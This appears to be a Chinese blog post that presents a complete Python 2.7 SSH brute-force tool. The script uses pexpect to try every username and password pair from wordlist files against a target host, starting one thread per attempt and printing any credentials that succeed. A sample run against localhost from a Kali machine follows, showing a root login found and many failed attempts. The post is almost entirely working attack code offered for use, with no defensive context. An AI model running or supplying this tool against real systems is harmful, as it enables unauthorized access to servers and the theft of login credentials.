利用python暴力破解ssh

 1 # -*- coding:utf-8 -*-
 2 #python 2.7
 3 
 4 import optparse,sys,threading
 5 import pexpect
 6 
 7 PROMPT = [‘#‘,‘>‘,‘/$‘]
 8 def ssh(host,user,password):
 9     child = pexpect.spawn(‘ssh %s@%s‘ % (user,host))
10     ret = child.expect([‘(?i)are you sure.*‘,‘(?i)password:‘,pexpect.TIMEOUT,pexpect.EOF])
11     #print child.before
12     if ret == 0:
13         child.sendline(‘yes‘)
14         child.expect(‘[pP]ssword:‘)
15         child.sendline(password)
16         try:
17             ret0 = child.expect(PROMPT)
18             if ret0 in (0,1,2):
19                 #print child.before
20                 print ‘[+] 已经连接0‘
21                 print ‘<*>用户是：‘ + user
22                 print ‘<*>密码是：‘ + password
23                 #return child
24         except:
25             print ‘[-]连接失败0,密码错误！‘
26     elif ret == 1:
27         child.sendline(password)
28         try:
29             ret1 = child.expect(PROMPT)
30             print child.before
31             if ret1 in (0,1,2):
32                 #print child.before
33                 print ‘[+] 已经连接1‘
34                 print ‘<*>用户是：‘ + user
35                 print ‘<*>密码是：‘ + password
36                 #return child
37         except:
38             print ‘[-]连接失败1，用户或密码错误！‘
39     else:
40         print ‘[-] 连接失败2‘
41 
42 def main():
43     usage = ‘Usage:%prog <-H host> <-U user.txt> <-D dictionary.txt>‘
44     parser = optparse.OptionParser(usage,version=‘%prog v1.0‘)
45     parser.add_option(‘-H‘,dest=‘target_host‘,type=‘string‘,
46                       help=‘目标主机‘)
47     parser.add_option(‘-U‘,dest=‘user‘,type=‘string‘,
48                       help=‘ssh用户‘)
49     parser.add_option(‘-D‘,dest=‘dictionary‘,type=‘string‘,
50                       help=‘密码字典‘)
51     (options,args) = parser.parse_args()
52     if  (not options.target_host) | (not options.user) | (not options.dictionary):
53         print parser.usage
54         exit(0)
55     else:
56         target_host = options.target_host
57         users = options.user
58         passwords = options.dictionary
59     users = open(users)
60     passwords = open(passwords)
61     #i = 0
62     for user in users:
63         user = user.strip(‘\r\n‘)
64         #print user + str(i)
65         #i = i + 1
66         passwords.seek(0)#回到密码文件行首
67         for password in passwords:
68             password = password.strip(‘\r\n‘)
69             #print user
70             t = threading.Thread(target=ssh,args=(target_host,user,password))
71             t.start()
72 
73 if __name__ == ‘__main__‘:
74     main()

python Sshconector.py  -H 127.0.0.1 -U user.txt -D password.txt
 
Linux HOSTKALI 3.18.0-kali1-amd64 
[+] 已经连接1
<*>用户是：root
<*>密码是：xxxxxxx
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！
[-]连接失败1，用户或密码错误！